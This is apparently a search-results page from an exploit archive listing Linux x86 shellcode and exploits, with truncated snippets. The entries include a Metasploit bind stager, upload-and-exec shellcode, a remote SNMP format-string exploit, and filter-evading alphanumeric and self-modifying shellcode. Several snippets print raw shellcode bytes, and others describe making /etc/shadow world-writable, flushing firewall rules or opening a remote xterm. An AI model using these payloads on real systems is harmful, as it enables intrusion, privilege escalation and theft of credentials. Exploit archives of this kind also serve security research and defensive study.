577 matches found
Linux Mettle x86, Bind TCP Stager (Linux x86)
Inject the mettle server payload staged. Listen for a connection Linux x86 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 111 include Msf::Payload::Stager include...
linux/x86 chroot & standart 66 bytes
linux/x86 chroot & standart 66 bytes. Shellcode exploit for linx86 platform / Linux/x86 chroot and standart shellcode. By Okti http://okti.nm.ru ---------------------------------------------------------------------------------------------- / / Mkdir and Chroot are written in C: / include include...
linux/x86 chroot & standart 66 bytes
Exploit for linux/x86 platform in category shellcode ==================================== linux/x86 chroot & standart 66 bytes ==================================== Linux/x86 chroot and standart shellcode. By Okti http://okti.nm.ru...
linux/x86 upload & exec 189 bytes
linux/x86 upload & exec 189 bytes. Shellcode exploit for linx86 platform UPLOAD & EXEC SHELLCODE 1 converting asm to hex 2 asm code 3 hex output 4 upload function This is an 'upload and exec' shellcode for the x86 platform. File has to be in executable format, cool if you know the distribution of...
Snmppd SNMP Proxy Daemon Remote Format String Exploit
Exploit for linux platform in category remote exploits ===================================================== Snmppd SNMP Proxy Daemon Remote Format String Exploit ===================================================== / Snmppd SNMP proxy daemon format string exploit cybertronicatgmxdotnet 04/29/20...
Aeon 0.2a - Local Linux (1)
Aeon 0.2a - Local Linux 1 !/usr/bin/perl Aeon-mail relay agent for Linux written by lammat just for practice purposes tested against aeon-0.2a http://grpower.ath.cx [email protected] execve/bin/sh for linux x86 29 bytes by Matias Sedalo $shellcode =...
linux/x86 setreuid/execve 31 bytes
No description provided by source. / 31 byte setreuid shellcode - man shadow os: Slackware 9.1, Phlak 2.4, Knoppix 0.1 www.manshadow.org [email protected] irc.efnet.net manshadow / char shellcode = "\x31\xC9" / xor ecx,ecx / "\x31\xDB" / xor ebx,ebx / "\x6A\x46" / push byte 70 / "\x58" / pop eax...
linux/x86 setreuid/execve 31 bytes
Exploit for linux/x86 platform in category shellcode ================================== linux/x86 setreuid/execve 31 bytes ================================== / 31 byte setreuid shellcode - man shadow os: Slackware 9.1, Phlak 2.4, Knoppix 0.1 www.manshadow.org email protected irc.efnet.net manshad...
linux/x86 Magic Byte Self Modifying Code 76 bytes
No description provided by source. /-------------------------------------------------------/ / Magic Byte Self Modifying Code for surviving / / toupper & tolower / / 76bytes execve exit code by XORt / /-------------------------------------------------------/ "\xeb\x34" / jmp $0x34 revert / "\x5e"...
linux/x86 Radically Self Modifying Code 70 bytes
No description provided by source. /-------------------------------------------------------/ / Radically Self Modifying Code for surviving / / toupper and tolower / / / / 70byte execve & exit code by XORt / /-------------------------------------------------------/ "\xeb\x12" / jmp $0x12 / "\x5e" ...
linux/x86 alpha-numeric using IMUL Method shellcode 88 bytes
linux/x86 alpha-numeric using IMUL Method shellcode 88 bytes. Shellcode exploit for linx86 platform /-----------------------------------------------------/ / Alpha-Numeric Shellcode using IMUL Method / / By XORt@dallas2600 88bytes / /-----------------------------------------------------/...
linux/x86 alpha-numeric shellcode 64 bytes
linux/x86 alpha-numeric shellcode 64 bytes. Shellcode exploit for linx86 platform /--------------------------------------/ / 64 byte alpha-numeric shellcode / / by XORt@dallas2600 64bytes / /--------------------------------------/ "\x6a\x30" / pushb $0x30 / "\x58" / pop %eax / "\x34\x30" / xorb...
linux/x86 Radically Self Modifying Code 70 bytes
Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 Radically Self Modifying Code 70 bytes ================================================ /-------------------------------------------------------/ / Radically Self Modifying Code for...
linux/x86 alpha-numeric shellcode 64 bytes
Exploit for linux/x86 platform in category shellcode ========================================== linux/x86 alpha-numeric shellcode 64 bytes ========================================== /--------------------------------------/ / 64 byte alpha-numeric shellcode / / by email protected2600 64bytes /...
linux/x86 execve"/bin/ash",0,0; 21 bytes
linux/x86 execve"/bin/ash",0,0; 21 bytes. Shellcode exploit for linx86 platform / 21 byte execve"/bin/ash",0,0; shellcode for linux x86 by zasta zasta at darkircop.org / include include char shellcode = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68" "\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80";...
linux/x86 execve("/bin/ash",0,0); 21 bytes
Exploit for linux/x86 platform in category shellcode ========================================== linux/x86 execve"/bin/ash",0,0; 21 bytes ========================================== / 21 byte execve"/bin/ash",0,0; shellcode for linux x86 by zasta zasta at darkircop.org / include include char...
linux/x86 ipchains -F 49 bytes
Exploit for linux/x86 platform in category shellcode ============================== linux/x86 ipchains -F 49 bytes ============================== include include / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cer...
linux/x86 chmod 666 shadow ENCRYPT 75 bytes
No description provided by source. / !!!!!! ANTI IDS SHELLCODE !!!!!! [email protected] 0x17abril0x7d2 !!!!! ENCRIPTADA !!!!! 75 bytes chmod 666 /etc/shadow !!!!! ENCRIPTADA !!!!! Para mas informacion Descargue http://www.shellcode.com.ar/Projects/JempiScodesversion.tgz !!!!!! ANTI IDS...
linux/x86 xterm -ut -display [IP]:0 132 bytes
Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 xterm -ut -display IP:0 132 bytes ============================================= / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change ...
linux/x86 execve /bin/sh alphanumeric 392 bytes
No description provided by source. / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc = // nops here .. "LLLLXPY3E01E01u03u0fXh8eshXf5VJPfhbifhDefXf5AJfPDTYhKATYX5KATY" "PQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfXf3E0f1E0f1U0fh88fX0E1f1E0f"...